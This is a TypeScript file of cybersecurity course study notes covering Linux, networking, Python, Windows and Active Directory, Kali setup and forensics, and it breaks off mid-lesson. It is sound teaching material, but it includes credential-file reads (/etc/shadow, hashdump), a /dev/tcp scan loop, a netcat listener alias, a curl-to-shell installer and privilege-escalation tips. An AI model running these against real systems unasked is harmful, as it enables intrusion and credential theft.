/**
 * Study notes for every lesson, keyed by lesson ID.
 * Each value is a plain-text study guide with sections separated by headers (##),
 * bullet points (- ), code blocks (```), and key terms (**bold**).
 */
export const lessonNotes: Record<string, string> = {

  // ═══════════════════════════════════════════
  // FOUNDATIONS — Linux Fundamentals
  // ═══════════════════════════════════════════

  "linux-intro": `## What is Linux?
Linux is an open-source operating system kernel created by Linus Torvalds in 1991. Combined with GNU tools, it forms the basis of most servers, cloud infrastructure, and cybersecurity tools.

## Why Linux for Cybersecurity?
- Most servers run Linux (web servers, databases, firewalls)
- Nearly all security tools are built for Linux (Kali, Parrot OS)
- Understanding Linux internals is essential for both attacking and defending systems
- Log analysis, scripting, and forensics all require Linux proficiency

## Key Distributions
- **Kali Linux** — Pre-loaded with 600+ security tools, purpose-built for pentesting
- **Ubuntu/Debian** — General purpose, widely used in servers
- **CentOS/RHEL** — Enterprise Linux, common in corporate environments
- **Parrot OS** — Security-focused alternative to Kali

## Setting Up Your Lab
1. Install VirtualBox or VMware Workstation (free)
2. Download a Kali Linux ISO or pre-built VM image
3. Allocate at least 2GB RAM and 20GB disk
4. Configure networking (NAT for internet, Host-Only for isolated labs)

## Essential First Commands
\`\`\`bash
whoami        # Current user
pwd           # Present working directory
ls            # List files
cd /path      # Change directory
man command   # Read the manual page
\`\`\``,

  "linux-filesystem": `## Linux Directory Hierarchy
\`\`\`
/           Root of the filesystem
├── /bin    Essential binaries (ls, cp, cat)
├── /sbin   System binaries (fdisk, iptables)
├── /etc    Configuration files
├── /home   User home directories
├── /var    Variable data (logs, mail, spool)
├── /tmp    Temporary files (world-writable)
├── /opt    Optional/third-party software
├── /proc   Virtual filesystem for process info
├── /dev    Device files
└── /root   Root user's home directory
\`\`\`

## Navigation Commands
\`\`\`bash
pwd                    # Print working directory
cd /var/log            # Absolute path
cd ../                 # Go up one level
cd ~                   # Go to home directory
ls -la                 # List all files with details
ls -lah                # Human-readable sizes
tree -L 2              # Tree view, 2 levels deep
\`\`\`

## File Operations
\`\`\`bash
cp source dest         # Copy file
mv source dest         # Move/rename
rm file                # Delete file
rm -rf directory       # Delete directory recursively
mkdir -p path/to/dir   # Create nested directories
touch newfile          # Create empty file
cat file               # Display file contents
less file              # Paginated viewer
head -n 20 file        # First 20 lines
tail -f /var/log/syslog  # Follow log in real-time
\`\`\`

## File Permissions
\`\`\`
-rwxr-xr-x  1 root root 4096 Jan 1 file.sh
│├─┤├─┤├─┤
│ │   │  └── Others: r-x (read + execute)
│ │   └───── Group:  r-x (read + execute)
│ └───────── Owner:  rwx (read + write + execute)
└─────────── File type (- = file, d = directory, l = link)
\`\`\`

## Permission Numbers
- **r = 4, w = 2, x = 1**
- chmod 755 = rwxr-xr-x (owner full, others read+execute)
- chmod 644 = rw-r--r-- (owner read+write, others read only)
- chmod 600 = rw------- (owner only)`,

  "linux-processes": `## Process Management
Every running program is a process with a unique PID (Process ID).

## Viewing Processes
\`\`\`bash
ps aux                # All processes with details
ps -ef                # Full format listing
top                   # Real-time process monitor
htop                  # Interactive process viewer (better)
pstree                # Process tree hierarchy
\`\`\`

## Process Control
\`\`\`bash
kill PID              # Send SIGTERM (graceful stop)
kill -9 PID           # Send SIGKILL (force stop)
killall processname   # Kill all by name
bg                    # Resume suspended job in background
fg                    # Bring background job to foreground
Ctrl+Z                # Suspend current process
Ctrl+C                # Interrupt (SIGINT)
nohup command &       # Run process immune to hangups
\`\`\`

## Services (systemd)
\`\`\`bash
systemctl start ssh       # Start a service
systemctl stop ssh        # Stop a service
systemctl enable ssh      # Start on boot
systemctl disable ssh     # Don't start on boot
systemctl status ssh      # Check service status
systemctl list-units --type=service  # List all services
\`\`\`

## Scheduled Tasks (Cron)
\`\`\`bash
crontab -e               # Edit current user's crontab
crontab -l               # List cron jobs
cat /etc/crontab          # System-wide cron jobs
\`\`\`
Cron format: \`minute hour day month weekday command\`
- \`0 2 * * * /backup.sh\` — Run at 2:00 AM daily
- \`*/5 * * * * /check.sh\` — Run every 5 minutes

## Security Note
- Check cron jobs during pentests — writable scripts run by root = privilege escalation
- \`/etc/crontab\`, \`/var/spool/cron/\`, \`/etc/cron.d/\` are key locations`,

  "linux-users": `## User Management
\`\`\`bash
whoami                    # Current user
id                        # UID, GID, and groups
cat /etc/passwd           # All user accounts
cat /etc/shadow           # Password hashes (root only)
cat /etc/group            # All groups
\`\`\`

## /etc/passwd Format
\`\`\`
username:x:UID:GID:comment:home_dir:shell
root:x:0:0:root:/root:/bin/bash
\`\`\`
- UID 0 = root (superuser)
- x = password stored in /etc/shadow

## User Commands
\`\`\`bash
useradd -m username       # Create user with home directory
usermod -aG sudo username # Add user to sudo group
passwd username           # Set/change password
userdel -r username       # Delete user and home directory
\`\`\`

## Sudo
\`\`\`bash
sudo command              # Run as root
sudo -l                   # List allowed sudo commands
sudo -u user command      # Run as specific user
visudo                    # Edit sudoers file safely
\`\`\`

## Security Implications
- **Weak passwords** in /etc/shadow can be cracked with John or Hashcat
- **sudo misconfigs** are a top privilege escalation vector
- \`sudo -l\` is one of the first commands to run after gaining access
- Users in the \`docker\` group can often escalate to root`,

  "linux-shell-scripting": `## Bash Scripting Basics
\`\`\`bash
#!/bin/bash
# Shebang line — tells the OS to use bash

# Variables
NAME="Frisyre"
echo "Welcome to $NAME"

# Command substitution
CURRENT_USER=$(whoami)
echo "Running as: $CURRENT_USER"
\`\`\`

## Control Flow
\`\`\`bash
# If/else
if [ "$USER" = "root" ]; then
    echo "Running as root"
elif [ -f /etc/shadow ]; then
    echo "Shadow file exists"
else
    echo "Limited access"
fi

# For loop
for ip in $(seq 1 254); do
    ping -c 1 -W 1 192.168.1.$ip &>/dev/null && echo "192.168.1.$ip is alive"
done

# While loop
while read line; do
    echo "Processing: $line"
done < input.txt
\`\`\`

## Useful Patterns for Security
\`\`\`bash
# Simple port scanner
for port in 21 22 80 443 8080; do
    (echo >/dev/tcp/target/$port) 2>/dev/null && echo "Port $port open"
done

# Log parser
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn

# File integrity checker
find /etc -type f -exec md5sum {} \\; > baseline.txt
\`\`\`

## Key Concepts
- **Exit codes**: 0 = success, non-zero = failure
- **Piping**: \`command1 | command2\` sends output as input
- **Redirection**: \`>\` overwrite, \`>>\` append, \`2>\` stderr
- **$?** — exit code of last command
- **$1, $2** — script arguments`,

  // ═══════════════════════════════════════════
  // FOUNDATIONS — Networking
  // ═══════════════════════════════════════════

  "networking-osi": `## The OSI Model (7 Layers)
\`\`\`
Layer 7 — Application    HTTP, DNS, FTP, SSH, SMTP
Layer 6 — Presentation   SSL/TLS, encryption, encoding
Layer 5 — Session        Session management, NetBIOS
Layer 4 — Transport      TCP (reliable), UDP (fast)
Layer 3 — Network        IP addressing, routing
Layer 2 — Data Link      MAC addresses, switches, ARP
Layer 1 — Physical       Cables, signals, hubs
\`\`\`

## TCP/IP Model (4 Layers)
\`\`\`
Application    (OSI 5-7)  HTTP, DNS, SSH
Transport      (OSI 4)    TCP, UDP
Internet       (OSI 3)    IP, ICMP, ARP
Network Access (OSI 1-2)  Ethernet, Wi-Fi
\`\`\`

## TCP vs UDP
| Feature | TCP | UDP |
|---------|-----|-----|
| Connection | Connection-oriented (3-way handshake) | Connectionless |
| Reliability | Guaranteed delivery, ordered | Best-effort, no ordering |
| Speed | Slower (overhead) | Faster |
| Use cases | HTTP, SSH, FTP | DNS, DHCP, streaming |

## TCP Three-Way Handshake
1. **SYN** — Client sends SYN to server
2. **SYN-ACK** — Server responds with SYN-ACK
3. **ACK** — Client sends ACK, connection established

## Common Ports
\`\`\`
20/21  FTP          22    SSH         23    Telnet
25     SMTP         53    DNS         80    HTTP
110    POP3         143   IMAP        443   HTTPS
445    SMB          3306  MySQL       3389  RDP
5432   PostgreSQL   8080  HTTP-Alt    5985  WinRM
\`\`\``,

  "networking-dns-http": `## DNS (Domain Name System)
DNS translates human-readable domain names to IP addresses.

## DNS Query Flow
1. Browser checks local cache
2. Queries recursive resolver (ISP or 8.8.8.8)
3. Resolver queries root server → TLD server → authoritative server
4. IP address returned to browser

## DNS Record Types
- **A** — Domain → IPv4 address
- **AAAA** — Domain → IPv6 address
- **CNAME** — Alias pointing to another domain
- **MX** — Mail server for the domain
- **TXT** — Text records (SPF, DKIM, verification)
- **NS** — Nameserver for the domain
- **PTR** — Reverse DNS (IP → domain)

## DNS Lookup Commands
\`\`\`bash
nslookup example.com          # Basic lookup
dig example.com ANY           # Detailed lookup, all records
dig @8.8.8.8 example.com MX  # Query specific DNS server
host example.com              # Simple lookup
\`\`\`

## HTTP/HTTPS
- **HTTP** (port 80) — Unencrypted web traffic
- **HTTPS** (port 443) — Encrypted with TLS

## HTTP Methods
- **GET** — Retrieve data
- **POST** — Send data (forms, APIs)
- **PUT** — Update/replace resource
- **DELETE** — Remove resource
- **HEAD** — GET without response body
- **OPTIONS** — List supported methods

## HTTP Status Codes
- **200** OK | **301** Redirect | **403** Forbidden
- **404** Not Found | **500** Server Error | **401** Unauthorized

## TLS Handshake (Simplified)
1. Client Hello (supported ciphers, SNI hostname)
2. Server Hello (chosen cipher, certificate)
3. Key exchange (asymmetric → symmetric key established)
4. Encrypted communication begins`,

  "networking-subnetting": `## IP Addressing
- **IPv4**: 32-bit address (e.g., 192.168.1.1)
- **IPv6**: 128-bit address (e.g., 2001:db8::1)

## Private IP Ranges (RFC 1918)
\`\`\`
10.0.0.0/8        10.0.0.0 – 10.255.255.255
172.16.0.0/12     172.16.0.0 – 172.31.255.255
192.168.0.0/16    192.168.0.0 – 192.168.255.255
\`\`\`

## CIDR Notation & Subnet Masks
\`\`\`
/8   = 255.0.0.0       16,777,214 hosts
/16  = 255.255.0.0     65,534 hosts
/24  = 255.255.255.0   254 hosts
/25  = 255.255.255.128 126 hosts
/26  = 255.255.255.192 62 hosts
/27  = 255.255.255.224 30 hosts
/28  = 255.255.255.240 14 hosts
/29  = 255.255.255.248 6 hosts
/30  = 255.255.255.252 2 hosts
/32  = 255.255.255.255 1 host (single address)
\`\`\`

## Subnetting Formula
- **Hosts per subnet** = 2^(32 - prefix) - 2
- Subtract 2 for network address and broadcast address

## Quick Subnetting Example
Given 192.168.1.0/26:
- Subnet mask: 255.255.255.192
- Block size: 256 - 192 = 64
- Subnets: .0-.63, .64-.127, .128-.191, .192-.255
- Usable hosts per subnet: 62

## Key Concepts
- **Network address**: First IP in subnet (all host bits = 0)
- **Broadcast address**: Last IP in subnet (all host bits = 1)
- **Default gateway**: Router IP for reaching other networks
- **NAT**: Translates private IPs to public IPs for internet access`,

  "networking-packet-analysis": `## Wireshark Basics
Wireshark captures and analyzes network packets in real-time.

## Essential Display Filters
\`\`\`
ip.addr == 192.168.1.1         # Traffic to/from an IP
tcp.port == 80                  # HTTP traffic
dns                             # DNS queries only
http.request.method == "POST"   # HTTP POST requests
tcp.flags.syn == 1              # SYN packets (connections)
!(arp or dns)                   # Exclude noise
tcp.stream eq 5                 # Follow specific TCP stream
ip.src == 10.0.0.5 && tcp.port == 445  # SMB from specific host
\`\`\`

## Capture Filters (set before capture)
\`\`\`
host 192.168.1.1           # Only this host
port 80                     # Only port 80
net 10.0.0.0/24             # Only this subnet
\`\`\`

## tcpdump (Command-Line Alternative)
\`\`\`bash
tcpdump -i eth0                     # Capture on interface
tcpdump -i eth0 -w capture.pcap     # Save to file
tcpdump -r capture.pcap             # Read from file
tcpdump -i eth0 port 80             # Filter by port
tcpdump -i eth0 host 10.0.0.1       # Filter by host
tcpdump -i eth0 -A                  # Show ASCII content
\`\`\`

## What to Look For
- **Unusual ports**: Non-standard services, potential C2
- **Large DNS queries**: DNS tunneling/exfiltration
- **Cleartext credentials**: FTP, Telnet, HTTP Basic Auth
- **ARP anomalies**: ARP spoofing (unsolicited replies)
- **Beaconing**: Regular interval connections to external IPs
- **Data volume**: Spikes may indicate exfiltration`,

  // ═══════════════════════════════════════════
  // FOUNDATIONS — Python
  // ═══════════════════════════════════════════

  "python-basics": `## Python Fundamentals
\`\`\`python
# Variables and types
name = "Frisyre"          # String
port = 80                  # Integer
is_open = True             # Boolean
hosts = ["10.0.0.1"]       # List
config = {"port": 80}      # Dictionary

# String formatting
print(f"Scanning port {port}")

# Input
target = input("Enter target IP: ")
\`\`\`

## Control Flow
\`\`\`python
# Conditionals
if port == 80:
    print("HTTP")
elif port == 443:
    print("HTTPS")
else:
    print(f"Unknown port {port}")

# Loops
for port in range(1, 1025):
    scan(port)

for host in ["10.0.0.1", "10.0.0.2"]:
    ping(host)

while attempts < 3:
    try_login()
    attempts += 1
\`\`\`

## Functions
\`\`\`python
def scan_port(host, port):
    """Attempt to connect to a port."""
    try:
        sock = socket.socket()
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        return result == 0  # True if open
    finally:
        sock.close()
\`\`\`

## File Operations
\`\`\`python
# Reading
with open("/etc/passwd", "r") as f:
    for line in f:
        print(line.strip())

# Writing
with open("results.txt", "w") as f:
    f.write("Port 80: Open\\n")
\`\`\`

## Error Handling
\`\`\`python
try:
    response = requests.get(url, timeout=5)
except requests.Timeout:
    print("Connection timed out")
except Exception as e:
    print(f"Error: {e}")
\`\`\``,

  "python-networking": `## Socket Programming
\`\`\`python
import socket

# Simple port scanner
def scan(target, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    result = sock.connect_ex((target, port))
    sock.close()
    return result == 0

# Banner grabbing
def grab_banner(target, port):
    sock = socket.socket()
    sock.settimeout(2)
    sock.connect((target, port))
    banner = sock.recv(1024).decode().strip()
    sock.close()
    return banner
\`\`\`

## HTTP with Requests Library
\`\`\`python
import requests

# GET request
r = requests.get("http://target/api/users", timeout=5)
print(r.status_code, r.json())

# POST request (login)
data = {"username": "admin", "password": "password123"}
r = requests.post("http://target/login", data=data)

# Custom headers
headers = {"Authorization": "Bearer token123"}
r = requests.get("http://target/api", headers=headers)

# Handling cookies/sessions
session = requests.Session()
session.post("http://target/login", data=creds)
r = session.get("http://target/dashboard")  # Authenticated
\`\`\`

## Scapy — Packet Crafting
\`\`\`python
from scapy.all import *

# Ping (ICMP Echo Request)
response = sr1(IP(dst="10.0.0.1")/ICMP(), timeout=2)

# SYN scan
ans = sr1(IP(dst="10.0.0.1")/TCP(dport=80, flags="S"), timeout=1)
if ans and ans[TCP].flags == "SA":
    print("Port 80 is open")

# ARP scan
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="10.0.0.0/24"), timeout=2)
for sent, received in ans:
    print(f"{received.psrc} -> {received.hwsrc}")
\`\`\``,

  "python-automation": `## Automating Security Tasks

## Log Parsing
\`\`\`python
import re
from collections import Counter

# Parse failed SSH logins
failed_ips = []
with open("/var/log/auth.log") as f:
    for line in f:
        if "Failed password" in line:
            ip = re.search(r'from (\\S+)', line)
            if ip:
                failed_ips.append(ip.group(1))

# Top attackers
for ip, count in Counter(failed_ips).most_common(10):
    print(f"{ip}: {count} attempts")
\`\`\`

## Subdomain Enumeration
\`\`\`python
import requests

wordlist = open("subdomains.txt").read().splitlines()
for sub in wordlist:
    url = f"http://{sub}.target.com"
    try:
        r = requests.get(url, timeout=3)
        print(f"[{r.status_code}] {url}")
    except:
        pass
\`\`\`

## API Interaction
\`\`\`python
import requests

# Query VirusTotal
api_key = "YOUR_KEY"
file_hash = "abc123..."
url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
headers = {"x-apikey": api_key}
r = requests.get(url, headers=headers)
result = r.json()
detections = result["data"]["attributes"]["last_analysis_stats"]
print(f"Malicious: {detections['malicious']}/{sum(detections.values())}")
\`\`\`

## Report Generation
\`\`\`python
from datetime import datetime

def generate_report(findings):
    report = f"# Security Scan Report\\n"
    report += f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M')}\\n\\n"
    for f in findings:
        report += f"## {f['title']}\\n"
        report += f"Severity: {f['severity']}\\n"
        report += f"Details: {f['details']}\\n\\n"
    with open("report.md", "w") as file:
        file.write(report)
\`\`\``,

  // ═══════════════════════════════════════════
  // FOUNDATIONS — OS Security
  // ═══════════════════════════════════════════

  "windows-security": `## Windows Security Architecture
- **SAM (Security Accounts Manager)** — Stores local user password hashes
- **LSASS (Local Security Authority)** — Handles authentication, stores credentials in memory
- **UAC (User Account Control)** — Prompts for elevation when admin actions are needed
- **Windows Defender** — Built-in antivirus and endpoint protection

## Key Security Features
- **BitLocker** — Full disk encryption
- **Windows Firewall** — Host-based firewall with advanced rules
- **Event Logging** — Security, System, Application logs
- **AppLocker** — Application whitelisting

## Important Event Log IDs
\`\`\`
4624  Successful logon            4625  Failed logon
4648  Logon with explicit creds   4672  Special privileges assigned
4720  User account created        4726  User account deleted
4732  Member added to group       4688  New process created
7045  New service installed        1102  Audit log cleared
\`\`\`

## PowerShell for Security
\`\`\`powershell
Get-EventLog -LogName Security -Newest 100
Get-LocalUser                           # List local users
Get-LocalGroupMember Administrators     # List admins
Get-Process | Sort-Object CPU -Desc     # Running processes
Get-NetTCPConnection                    # Network connections
Get-Service | Where Status -eq Running  # Running services
\`\`\`

## Registry Keys for Forensics
\`\`\`
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run    # Startup programs
HKLM\\SYSTEM\\CurrentControlSet\\Services               # Services
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs  # Recent files
\`\`\``,

  "ad-basics": `## What is Active Directory?
Active Directory (AD) is Microsoft's directory service for managing users, computers, groups, and policies in a Windows domain environment.

## Key Components
- **Domain Controller (DC)** — Server running AD DS, authenticates users
- **Domain** — Logical group of objects (users, computers)
- **Forest** — Collection of one or more domains
- **Organizational Unit (OU)** — Container for organizing objects
- **Group Policy Object (GPO)** — Rules applied to OUs

## AD Objects
- **Users** — Employee accounts with attributes (name, email, groups)
- **Computers** — Domain-joined machines
- **Groups** — Collections of users (Security groups control access)
- **Service Accounts** — Accounts for running services (often over-privileged)

## Authentication in AD
- **NTLM** — Legacy hash-based authentication (still widely used)
- **Kerberos** — Ticket-based authentication (default in AD)
  - **TGT** (Ticket Granting Ticket) — Proves user identity
  - **TGS** (Ticket Granting Service) — Grants access to specific services
  - **KDC** (Key Distribution Center) — Issues tickets (runs on DC)

## Why AD Matters for Security
- AD controls access to EVERYTHING in a corporate network
- Compromising AD = compromising the entire organization
- Common attack targets: service accounts, group memberships, Kerberos tickets
- Both blue and red teams must deeply understand AD`,

  "hardening": `## System Hardening Principles
Hardening reduces the attack surface by removing unnecessary software, closing ports, applying patches, and enforcing secure configurations.

## Linux Hardening Checklist
\`\`\`bash
# Update all packages
apt update && apt upgrade -y

# Disable unnecessary services
systemctl disable bluetooth
systemctl disable cups

# Configure firewall (UFW)
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
ufw enable

# SSH hardening (/etc/ssh/sshd_config)
PermitRootLogin no
PasswordAuthentication no    # Use keys only
MaxAuthTries 3
AllowUsers adminuser

# File permission audit
find / -perm -4000 -type f   # Find SUID files
find / -writable -type f     # Find world-writable files
\`\`\`

## Windows Hardening Checklist
- Enable BitLocker for disk encryption
- Configure Windows Firewall with strict rules
- Disable SMBv1: \`Set-SmbServerConfiguration -EnableSMB1Protocol $false\`
- Enable audit logging for logon events
- Apply Group Policy security baselines
- Remove unnecessary roles and features
- Use LAPS for local admin password management

## CIS Benchmarks
CIS (Center for Internet Security) provides free, detailed hardening guides for every major OS, database, and cloud platform. They define exactly what to configure for security compliance.`,

  // ═══════════════════════════════════════════
  // FOUNDATIONS — Kali Linux
  // ═══════════════════════════════════════════

  "kali-installation": `## Installing Kali Linux
Kali is best run as a virtual machine for security testing.

## VirtualBox Setup
1. Download Kali VM image from kali.org/get-kali
2. Import the .ova file into VirtualBox
3. Allocate 4GB+ RAM, 2+ CPU cores
4. Set Network to NAT (internet) + Host-Only (lab network)
5. Default credentials: kali/kali

## VMware Setup
1. Download VMware image from kali.org
2. Open the .vmx file in VMware
3. Same resource allocation as above
4. Install VMware Tools for better integration

## WSL2 (Windows Subsystem for Linux)
\`\`\`powershell
wsl --install -d kali-linux
\`\`\`
- Good for tool access, but no GUI by default
- Limited networking capabilities compared to a full VM

## Post-Installation Steps
\`\`\`bash
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y kali-linux-default   # Ensure all default tools
passwd                                    # Change default password!
\`\`\`

## Lab Networking Tips
- **NAT**: Kali can reach the internet (for updates)
- **Host-Only**: Isolated network for attacking lab VMs
- **Bridged**: Kali gets an IP on your real network (use carefully)`,

  "kali-customization": `## Customizing Your Kali Environment

## Terminal Setup
\`\`\`bash
# Oh-My-Zsh (better shell experience)
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

# Useful Zsh plugins
git clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/plugins/zsh-autosuggestions
git clone https://github.com/zsh-users/zsh-syntax-highlighting ~/.oh-my-zsh/plugins/zsh-syntax-highlighting

# Edit ~/.zshrc
plugins=(git zsh-autosuggestions zsh-syntax-highlighting)
\`\`\`

## Tmux (Terminal Multiplexer)
\`\`\`bash
tmux                          # Start new session
tmux new -s pentest           # Named session
Ctrl+B, %                     # Split vertical
Ctrl+B, "                     # Split horizontal
Ctrl+B, arrow keys            # Navigate panes
Ctrl+B, d                     # Detach session
tmux attach -t pentest        # Reattach
\`\`\`

## Useful Aliases (~/.zshrc)
\`\`\`bash
alias ll='ls -la'
alias serve='python3 -m http.server 8000'
alias myip='curl -s ifconfig.me'
alias scan='nmap -sC -sV'
alias listen='rlwrap nc -lvnp'
\`\`\`

## Key Settings
- Set your terminal font to a Nerd Font for icon support
- Enable copy/paste in VM settings (bidirectional clipboard)
- Create a shared folder between host and VM for file transfers`,

  "kali-essential-tools": `## Essential Kali Tools by Category

## Reconnaissance
- **Nmap** — Port scanning, service detection, scripting
- **Amass** — Subdomain enumeration
- **theHarvester** — Email, subdomain, and IP harvesting
- **Recon-ng** — OSINT framework

## Web Application Testing
- **Burp Suite** — Web proxy, scanner, and testing suite
- **Gobuster/feroxbuster** — Directory brute-forcing
- **Nikto** — Web server vulnerability scanner
- **SQLMap** — Automated SQL injection (exam-restricted)
- **WPScan** — WordPress vulnerability scanner

## Exploitation
- **Metasploit Framework** — Exploitation and post-exploitation
- **searchsploit** — Offline Exploit-DB search
- **msfvenom** — Payload generation

## Password Attacks
- **Hydra** — Online brute-forcing (SSH, FTP, HTTP)
- **John the Ripper** — Offline hash cracking
- **Hashcat** — GPU-accelerated hash cracking
- **CeWL** — Custom wordlist generator from websites

## Post-Exploitation
- **LinPEAS/WinPEAS** — Privilege escalation enumeration
- **Mimikatz** — Windows credential extraction
- **Chisel** — TCP tunneling over HTTP
- **Ligolo-ng** — Pivoting tool

## Networking
- **Wireshark** — Packet capture and analysis
- **Responder** — LLMNR/NBT-NS poisoning
- **tcpdump** — Command-line packet capture
- **Netcat (nc)** — Network Swiss army knife`,

  "kali-package-management": `## Package Management in Kali

## APT (Advanced Package Tool)
\`\`\`bash
sudo apt update                    # Update package lists
sudo apt upgrade                   # Upgrade installed packages
sudo apt full-upgrade              # Upgrade with dependency changes
sudo apt install tool-name         # Install a tool
sudo apt remove tool-name          # Remove a tool
sudo apt search keyword            # Search for packages
apt list --installed               # List installed packages
\`\`\`

## Kali Metapackages
\`\`\`bash
# Install tool groups
sudo apt install kali-linux-default          # Standard toolset
sudo apt install kali-linux-large            # Extended toolset
sudo apt install kali-tools-web              # Web testing tools
sudo apt install kali-tools-exploitation     # Exploitation tools
sudo apt install kali-tools-passwords        # Password tools
sudo apt install kali-tools-forensics        # Forensics tools
\`\`\`

## Installing from GitHub
\`\`\`bash
# Clone and install
git clone https://github.com/author/tool.git
cd tool
pip3 install -r requirements.txt   # Python dependencies
chmod +x tool.py
sudo ln -s $(pwd)/tool.py /usr/local/bin/tool  # Add to PATH

# Or use pipx for Python tools
pipx install tool-name
\`\`\`

## Keeping Tools Updated
\`\`\`bash
# Update everything
sudo apt update && sudo apt full-upgrade -y

# Update specific GitHub tools
cd /opt/tool && git pull

# Check Kali version
cat /etc/os-release
\`\`\``,

  "kali-workflow": `## Pentesting Workflow in Kali

## Directory Structure
\`\`\`
~/pentests/
├── client-name/
│   ├── recon/
│   │   ├── nmap/
│   │   ├── web/
│   │   └── osint/
│   ├── exploitation/
│   ├── post-exploitation/
│   ├── loot/           # Credentials, hashes, keys
│   ├── screenshots/
│   └── report/
\`\`\`

## Note-Taking
- **CherryTree**: Hierarchical, supports rich text and code blocks
- **Obsidian**: Markdown-based, great for linking concepts
- **Keep notes as you go** — don't rely on memory

## Screenshot Discipline
\`\`\`bash
# Flameshot (recommended)
flameshot gui                      # Interactive screenshot

# Command-line
import -window root screenshot.png  # Full screen
\`\`\`
- Screenshot EVERY proof hash, vulnerability, and key step
- Name files descriptively: \`target-port80-sqli-proof.png\`

## Workflow Checklist
1. **Scan** — Nmap full TCP + UDP top 20 + service versions
2. **Enumerate** — Each open port thoroughly before exploiting
3. **Research** — searchsploit, Google, HackTricks for each service/version
4. **Exploit** — Try the most likely vector first
5. **Escalate** — Run LinPEAS/WinPEAS, check sudo -l, SUID, cron
6. **Document** — Notes + screenshots at every step
7. **Loot** — Collect credentials, hashes, SSH keys for pivoting`,

  // ═══════════════════════════════════════════
  // BLUE TEAM — Digital Forensics
  // ═══════════════════════════════════════════

  "forensics-intro": `## Digital Forensics Fundamentals

## What is Digital Forensics?
The process of identifying, preserving, analyzing, and presenting digital evidence in a legally admissible manner.

## The Forensic Process
1. **Identification** — Determine what evidence exists and where
2. **Preservation** — Protect evidence from modification (write blockers, hashing)
3. **Collection** — Acquire forensic copies (images) of evidence
4. **Analysis** — Examine evidence for artifacts and indicators
5. **Reporting** — Document findings in a clear, reproducible report

## Chain of Custody
- Document WHO handled evidence, WHEN, and WHAT was done
- Any break in chain = evidence may be inadmissible in court
- Use evidence bags, labels, and custody forms

## Evidence Integrity
\`\`\`bash
# Hash the original drive BEFORE imaging
md5sum /dev/sda > original_hash.txt
sha256sum /dev/sda >> original_hash.txt

# Hash the image AFTER creation
md5sum evidence.dd > image_hash.txt

# Hashes must match — proves no modification
\`\`\`

## Key Principles
- **Never modify original evidence** — Always work on copies
- **Document everything** — Screenshots, timestamps, commands
- **Use write blockers** — Hardware or software to prevent writes
- **Maintain timeline** — Correlate events across multiple sources`,

  "disk-forensics": `## Disk Forensics & Imaging

## Creating Forensic Images
\`\`\`bash
# dd (basic)
dd if=/dev/sda of=evidence.dd bs=4M status=progress

# dc3dd (forensic dd with hashing)
dc3dd if=/dev/sda of=evidence.dd hash=sha256 log=imaging.log

# FTK Imager (GUI — Windows)
# Creates E01 (EnCase) format images with built-in verification
\`\`\`

## Image Formats
- **RAW (.dd)** — Bit-for-bit copy, universal compatibility
- **E01 (EnCase)** — Compressed, includes metadata and hashing
- **AFF4** — Advanced forensic format, supports compression

## Autopsy (Open-Source Platform)
- Ingest evidence images and analyze automatically
- Modules: hash lookup, keyword search, web artifacts, timeline
- Generates reports with findings

## KAPE (Kroll Artifact Parser & Extractor)
- Fast triage tool for collecting forensic artifacts
- Targets specific artifact locations instead of full disk
- Useful for IR when time is critical

## What to Look For
- **Deleted files** — Recoverable from unallocated space
- **File system timestamps** — Created, Modified, Accessed (MAC times)
- **$MFT** — Master File Table contains metadata for every file on NTFS
- **Alternate Data Streams** — Hidden data attached to NTFS files
- **Recycle Bin artifacts** — \`$I\` (metadata) and \`$R\` (content) files`,

  "memory-forensics": `## Memory Forensics with Volatility

## Why Memory Forensics?
RAM contains data that doesn't exist on disk:
- Running processes and their command lines
- Network connections (including closed ones)
- Decrypted data and encryption keys
- Injected code and rootkit artifacts
- User activity and clipboard contents

## Acquiring Memory
\`\`\`bash
# Linux
sudo dd if=/dev/mem of=memory.raw
# Or use LiME kernel module

# Windows
# Use WinPMEM, FTK Imager, or DumpIt
\`\`\`

## Volatility 3 Commands
\`\`\`bash
# Identify the OS
vol -f memory.raw windows.info

# List processes
vol -f memory.raw windows.pslist
vol -f memory.raw windows.pstree    # Tree view

# Find hidden/injected processes
vol -f memory.raw windows.malfind

# Network connections
vol -f memory.raw windows.netscan

# Command line history
vol -f memory.raw windows.cmdline

# Extract password hashes
vol -f memory.raw windows.hashdump

# Dump a specific process
vol -f memory.raw windows.dumpfiles --pid 1234

# List loaded DLLs
vol -f memory.raw windows.dlllist --pid 1234

# Registry analysis
vol -f memory.raw windows.registry.hivelist
\`\`\`

## Red Flags in Memory
- Processes running from unusual paths (e.g., svchost.exe NOT in System32)
- Processes with no parent or unexpected parent
- Memory regions with RWX (Read/Write/Execute) permissions
- Network connections to known-bad IPs or unusual ports`,

  "windows-artifacts": `## Windows Forensic Artifacts

## Key Artifacts by Category

### Execution Artifacts
- **Prefetch** — \`C:\\Windows\\Prefetch\\*.pf\` — Shows which apps ran and when
- **Shimcache** — Registry artifact tracking executed programs
- **Amcache** — \`C:\\Windows\\appcompat\\Programs\\Amcache.hve\` — Execution history with SHA1 hashes
- **BAM/DAM** — Background/Desktop Activity Moderator — Recent execution timestamps

### Persistence Artifacts
- **Run/RunOnce keys** — Programs that start with Windows
- **Scheduled Tasks** — \`C:\\Windows\\System32\\Tasks\\*\`
- **Services** — Registry: \`HKLM\\SYSTEM\\CurrentControlSet\\Services\`
- **Startup Folder** — \`%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\`

### User Activity
- **Recent Files** — \`NTUSER.DAT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\`
- **Shellbags** — Folder access history (persists even after folder deletion)
- **Jump Lists** — Recent files per application in the taskbar
- **USB History** — \`SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\`

### File System
